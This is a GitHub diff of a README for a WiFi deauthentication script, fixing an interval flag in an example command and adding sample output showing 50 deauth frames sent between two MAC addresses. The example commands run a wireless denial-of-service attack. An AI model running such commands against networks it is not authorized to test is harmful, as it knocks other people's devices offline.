File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -57,7 +57,7 @@ just run it...
5757(venv) $ sudo venv/bin/python ./WifiDeauth.py wlan1 ' 55:67:51:c3:2c:b4' ' 80:30:dc:c2:dd:62' -n 30
5858
5959# start sending deauth 50 packets from '80:30:dc:c2:dd:62' to '55:67:51:c3:2c:b4' every 300ms
60- (venv) $ sudo venv/bin/python ./WifiDeauth.py wlan1 ' 55:67:51:c3:2c:b4' ' 80:30:dc:c2:dd:62' -n 50 - ' 0.3'
60+ (venv) $ sudo venv/bin/python ./WifiDeauth.py wlan1 ' 55:67:51:c3:2c:b4' ' 80:30:dc:c2:dd:62' -n 50 -i ' 0.3'
6161```
6262
6363to interrupt press [ CTRL + c]
@@ -67,7 +67,9 @@ to interrupt press [CTRL + c]
6767some example from my terminal...
6868
6969``` shell
70- ... to be done ...
70+ Sending 50 frames every 0.3s to 55:67:51:c3:2c:b4 from 80:30:dc:c2:dd:62
71+ ..................................................
72+ Sent 50 packets.
7173```
7274
7375[ Go back] ( ../README.md )
You can’t perform that action at this time.
0 commit comments